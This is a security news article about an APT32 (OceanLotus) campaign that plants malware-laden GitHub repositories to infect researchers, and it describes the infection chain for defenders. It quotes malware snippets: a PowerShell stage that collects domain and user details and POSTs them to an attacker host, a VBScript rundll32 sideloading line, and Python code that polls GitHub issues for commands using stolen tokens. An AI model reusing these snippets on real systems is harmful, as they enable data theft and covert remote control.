The APT32 (OceanLotus) has launched a novel campaign weaponizing GitHub repositories to distribute malware to cybersecurity researchers and enterprises.
This operation represents a strategic shift from the group’s historical focus on Southeast Asian government and corporate targets, instead exploiting the trust inherent in open-source platforms to infiltrate specialized defense communities.
The malware, detected by ThreatBook analysts as Trojan.CobaltGate, employs a multi-stage infection chain beginning with socially engineered GitHub repositories posing as legitimate penetration testing tools.
.png
)
.webp)
These repositories contain obfuscated malicious code within PowerShell scripts and Visual Basic modules designed to bypass static analysis tools.
Attackers use GitHub Issues and Discussions to promote these tools to professionals searching for red-teaming resources, creating an appearance of authenticity through fake contributor activity and star ratings.
ThreatBook researchers identified the campaign’s signature tactic: weaponized repositories automatically clone and execute payloads via GitHub Actions workflows configured with encrypted triggers.
This technique allows threat actors to maintain plausible deniability while enabling remote code execution through compromised GitHub accounts.
The malware exhibits modular architecture with components tailored for credential harvesting, lateral movement, and persistent access to enterprise networks.
Infection Chain Analysis: From Repository Clone to Domain Dominance
The attack sequence begins when victims clone a repository containing a malicious setup.ps1 installer script. This PowerShell script executes a three-stage process:-
# Stage 1: Environment Reconnaissance
$SysData = Get-WmiObject Win32_ComputerSystem | Select-Object -Property Domain,UserName
$encodedData = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($sysData))
Invoke-WebRequest -Uri hxxps://github[.]com/assets/scan.php -Method POST -Body $encodedData
This reconnaissance phase collects domain architecture details and transmits them to attacker-controlled GitHub Pages sites masquerading as analytics platforms.
.webp)
The second stage deploys a memory-resident DLL sideloaded through a spoofed Visual Studio Code extension:-
‘ Stage 2: Persistence Mechanism
Set wshShell = CreateObject(“WScript.Shell”)
wshShell.Run “rundll32.exe “”%APPDATA%\vscode-ext\msvcp140.dll””,ExportInitialize”, 0
ThreatBook’s analysis reveals the DLL leverages API hooking to intercept security product communications, specifically targeting endpoint detection and response (EDR) solutions through forged Microsoft telemetry certificates.
The final payload establishes C2 communication via GitHub’s REST API using OAuth tokens stolen from compromised developer accounts:-
# Stage 3: C2 Communication via GitHub
import requests
def fetch_cmd(gh_token, repo):
headers = {“Authorization”: f”token {gh_token}”}
response = requests.get(
f”https://api.github.com/repos/{repo}/issues?labels=update”,
headers=headers
)
return response.json()[0][‘body’].split(‘|’)[1]
This technique allows the malware to blend command traffic with legitimate GitHub API calls, bypassing network monitoring tools that whitelist interactions with the platform.
ThreatBook’s reverse engineering team discovered the operators use elliptic-curve Diffie-Hellman (ECDH) key exchange within issue comments to establish encrypted tunnels.
Cybersecurity firms face new challenges as traditional indicators of compromise (IoCs) like malicious IP addresses become less relevant in platform-abuse attacks.
Researchers urged organizations to implement code repository monitoring solutions that analyze repository contributor histories, detect anomalous API token usage patterns, and profile actions workflow behaviors.
With over 87 million developers using GitHub, the platform’s dual role as collaboration hub and attack vector demands renewed scrutiny from enterprise security teams.
Equip your team with real-time threat analysis With ANY.RUN’s interactive cloud sandbox -> Try 14-day Free Trial
1 Comment
luj8q1